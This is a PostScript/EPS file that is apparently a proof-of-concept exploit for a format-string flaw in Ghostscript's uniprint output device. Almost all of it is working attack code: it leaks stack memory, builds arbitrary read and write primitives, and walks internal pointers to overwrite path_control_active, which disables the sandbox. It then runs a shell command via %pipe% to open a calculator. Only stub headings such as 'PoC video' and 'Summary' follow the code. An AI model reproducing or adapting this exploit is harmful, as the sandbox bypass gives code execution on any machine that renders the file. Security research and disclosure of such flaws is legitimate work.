%!PS-Adobe-3.0 EPSF-3.0 %%Pages: 1 %%BoundingBox: 36 36 576 756 %%LanguageLevel: 1 %%EndComments %%BeginProlog %%EndProlog % ====== Configuration ====== % Offset of `gp_file *out` on the stack /IdxOutPtr 5 def % ====== General Postscript utility functions ====== % from: https://github.com/scriptituk/pslutils/blob/master/string.ps /cat { exch dup length 2 index length add string dup dup 5 2 roll copy length exch putinterval } bind def % from: https://rosettacode.org/wiki/Repeat_a_string#PostScript /times { dup length dup % rcount ostring olength olength 4 3 roll % ostring olength olength rcount mul dup string % ostring olength flength fstring 4 1 roll % fstring ostring olength flength 1 sub 0 3 1 roll % fstring ostring 0 olength flength_minus_one { % fstring ostring iter 1 index 3 index % fstring ostring iter ostring fstring 3 1 roll % fstring ostring fstring iter ostring putinterval % fstring ostring } for pop % fstring } def % Printing helpers /println { print (\012) print } bind def /printnumln { =string cvs println } bind def % ====== Start of exploit helper code ====== % Make a new tempfile but only save its path. This gives us a file path to read/write % which will exist as long as this script runs. We don't actually use the file object % (hence `pop`) because we're passing the path to uniprint and reopening it ourselves. /PathTempFile () (w+) .tempfile pop def % Convert hex string "4142DEADBEEF" to padded little-endian byte string % str_ptr_to_le_bytes /str_ptr_to_le_bytes { % Convert hex string argument to Postscript string % using notation /ArgBytes exch (<) exch (>) cat cat token pop exch pop def % Prepare resulting string (`string` fills with zeros) /Res 8 string def % For every byte in the input 0 1 ArgBytes length 1 sub { /i exch def % put byte at index (len(ArgBytes) - 1 - i) Res ArgBytes length 1 sub i sub ArgBytes i get put } for Res % return } bind def % do_uniprint /do_uniprint { /FmtString exch def /StackString exch def % Select uniprint device with our payload << /OutputFile PathTempFile /OutputDevice /uniprint /upColorModel /DeviceCMYKgenerate /upRendering /FSCMYK32 /upOutputFormat /Pcl /upOutputWidth 99999 /upWriteComponentCommands {(x)(x)(x)(x)} % This is required, just put bogus strings /upYMoveCommand FmtString >> setpagedevice % Manipulate the interpreter to put a recognizable piece of data on the stack (%%__) StackString cat .runstring % Produce a page with some content to trigger uniprint logic newpath 1 1 moveto 1 2 lineto 1 setlinewidth stroke showpage % Read back the written data /InFile PathTempFile (r) file def /LeakedData InFile 4096 string readstring pop def InFile closefile LeakedData % return } bind def % get_index_of_controllable_stack /get_index_of_controllable_stack { % A recognizable token on the stack to search for /SearchToken (ABABABAB) def % Construct "1:%lx,2:%lx,3:%lx,...,400:%lx," /FmtString 0 string 1 1 400 { 3 string cvs (:%lx,) cat cat } for def SearchToken FmtString do_uniprint % Search for ABABABAB => 4241424142414241 (assume LE) (4241424142414241) search { exch pop exch pop %

 is left

		% Search for latest comma in  to get e.g. `123:` as 
		(,) rsearch pop pop pop

		% Search for colon and use  to get `123`
		(:) search pop exch pop exch pop

		% return as int
		cvi
	} {
		(Could not find our data on the stack.. exiting) println
		quit
	} ifelse
} bind def

%   write_to
/write_to {
	/AddrHex exch str_ptr_to_le_bytes def % address to write to
	/StackIdx exch def % stack idx to use

	/FmtString StackIdx 1 sub (%x) times (_%ln) cat def

	AddrHex FmtString do_uniprint

	pop % we don't care about formatted data
} bind def

%  read_ptr_at 
/read_ptr_at {
	/StackIdx exch def % stack idx to use

	/FmtString StackIdx 1 sub (%x) times (__%lx__) cat def

	() FmtString do_uniprint

	(__) search pop pop pop (__) search pop exch pop exch pop
} bind def

% num_bytes <= 9
%    read_dereferenced_bytes_at 
/read_dereferenced_bytes_at {
	/NumBytes exch def
	/PtrHex exch def
	/PtrOct PtrHex str_ptr_to_le_bytes def % address to read from
	/StackIdx exch def % stack idx to use

	/FmtString StackIdx 1 sub (%x) times (__%.) NumBytes 1 string cvs cat (s__) cat cat def

	PtrOct FmtString do_uniprint

	/Data exch (__) search pop pop pop (__) search pop exch pop exch pop def

	% Check if we were able to read all bytes
	Data length NumBytes eq {
		% Yes we did! So return the integer conversion of the bytes
		0 % accumulator
		NumBytes 1 sub -1 0 {
			exch %  
			256 mul exch %  
			Data exch get % 
			add % 
		} for
	} {
		% We did not read all bytes, add a null byte and recurse on addr+1
		StackIdx 1 PtrHex ptr_add_offset NumBytes 1 sub read_dereferenced_bytes_at
		256 mul
	} ifelse
} bind def

%   read_dereferenced_ptr_at 
/read_dereferenced_ptr_at {
	% Read 6 bytes
	6 read_dereferenced_bytes_at

	% Convert to hex string and return
	16 12 string cvrs
} bind def

%   ptr_add_offset 
/ptr_add_offset {
	/PtrHexStr exch def % hex string pointer
	/Offset exch def % integer to add

	/PtrNum (16#) PtrHexStr cat cvi def

	% base 16, string length 12
	PtrNum Offset add 16 12 string cvrs
} bind def

() println

% ====== Start of exploit logic ======

% Find out the index of the controllable bytes
% This is around the 200-300 range but differs per binary/version
/IdxStackControllable get_index_of_controllable_stack def
(Found controllable stack region at index: ) print IdxStackControllable printnumln

% Exploit steps:
% - `gp_file *out` is at stack index `IdxOutPtr`.
%
% - Controllable data is at index `IdxStackControllable`.
%
% - We want to find out the address of: 
%       out->memory->gs_lib_ctx->core->path_control_active
%   hence we need to dereference and add ofsets a few times
%
% - Once we have the address of `path_control_active`, we use
%   our write primitive to write an integer to its address - 3
%   such that the most significant bytes (zeros) of that integer
%   overwrite `path_control_active`, setting it to 0.
%
% - Finally, with `path_control_active` disabled, we can use
%   the built-in (normally sandboxed) `%pipe%` functionality to
%   run shell commands

/PtrOut IdxOutPtr read_ptr_at def

(out: 0x) PtrOut cat println

% memory is at offset 144 in out
/PtrOutOffset 144 PtrOut ptr_add_offset def
/PtrMem IdxStackControllable PtrOutOffset read_dereferenced_ptr_at def

(out->mem: 0x) PtrMem cat println

% gs_lib_ctx is at offset 208 in memory
/PtrMemOffset 208 PtrMem ptr_add_offset def
/PtrGsLibCtx IdxStackControllable PtrMemOffset read_dereferenced_ptr_at def

(out->mem->gs_lib_ctx: 0x) PtrGsLibCtx cat println

% core is at offset 8 in gs_lib_ctx
/PtrGsLibCtxOffset 8 PtrGsLibCtx ptr_add_offset def
/PtrCore IdxStackControllable PtrGsLibCtxOffset read_dereferenced_ptr_at def

(out->mem->gs_lib_ctx->core: 0x) PtrCore cat println

% path_control_active is at offset 156 in core
/PtrPathControlActive 156 PtrCore ptr_add_offset def

(out->mem->gs_lib_ctx->core->path_control_active: 0x) PtrPathControlActive cat println

% Subtract a bit from the address to make sure we write a null over the field
/PtrTarget -3 PtrPathControlActive ptr_add_offset def

% And overwrite it!
IdxStackControllable PtrTarget write_to

% And now `path_control_active` == 0, so we can use %pipe%

(%pipe%gnome-calculator) (r) file

quit

PoC video

Summary

Description